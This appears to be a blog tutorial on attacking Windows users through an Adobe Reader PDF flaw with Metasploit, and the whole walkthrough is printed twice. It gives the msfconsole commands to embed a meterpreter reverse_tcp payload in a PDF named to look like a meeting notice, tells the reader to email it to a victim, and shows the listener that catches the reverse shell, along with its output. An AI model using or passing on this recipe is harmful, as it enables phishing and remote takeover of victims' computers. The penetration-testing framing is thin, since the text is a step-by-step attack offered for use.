File format bugs are exploitable vulnerabilities found within a given application, such as an Adobe PDF document. This class of exploit relies on a user actually opening a malicious file in a vulnerable application. Malicious files can be hosted remotely or sent via email.
In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe) Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.
Here the first step is create a malicious PDF to use in this attack by using vulnerability in Adobe Reader .
msf >use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf >set payload windows/meterpreter/reverse_tcp
msf >set filename Important_Meeting_Notice.pdf
msf >set lhost 192.168.8.92
msf >set lport 443
msf > exploit
The next step is sending our malicious code to target e-mail. send it to your victim's.
After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener. This will ensure that when the exploit is triggered, the attacker machine can receive the connection back from the target machine (reverse payload).
msf exploit(adobe_pdf_embedded_exe_nojs ) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.8.92 :443
[*] Starting the payload handler...
msf exploit(handler) >
After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and
click open. After the victim click open button, our listener start capture reverse connection.
We have successfully exploited a file format vulnerability by creating a malicious document through Metasploit and then sending it to our targeted user.
As a penetration tester, every bit of information can be used to craft an even better attack. Browser exploits and file format exploits are typically very effective, granted you do your homework.
In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe) Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.
Here the first step is create a malicious PDF to use in this attack by using vulnerability in Adobe Reader .
msf >use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf >set payload windows/meterpreter/reverse_tcp
msf >set filename Important_Meeting_Notice.pdf
msf >set lhost 192.168.8.92
msf >set lport 443
msf > exploit
The next step is sending our malicious code to target e-mail. send it to your victim's.
After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener. This will ensure that when the exploit is triggered, the attacker machine can receive the connection back from the target machine (reverse payload).
msf exploit(adobe_pdf_embedded_exe_nojs ) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.8.92 :443
[*] Starting the payload handler...
msf exploit(handler) >
After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and
click open. After the victim click open button, our listener start capture reverse connection.
We have successfully exploited a file format vulnerability by creating a malicious document through Metasploit and then sending it to our targeted user.
As a penetration tester, every bit of information can be used to craft an even better attack. Browser exploits and file format exploits are typically very effective, granted you do your homework.
No comments:
Post a Comment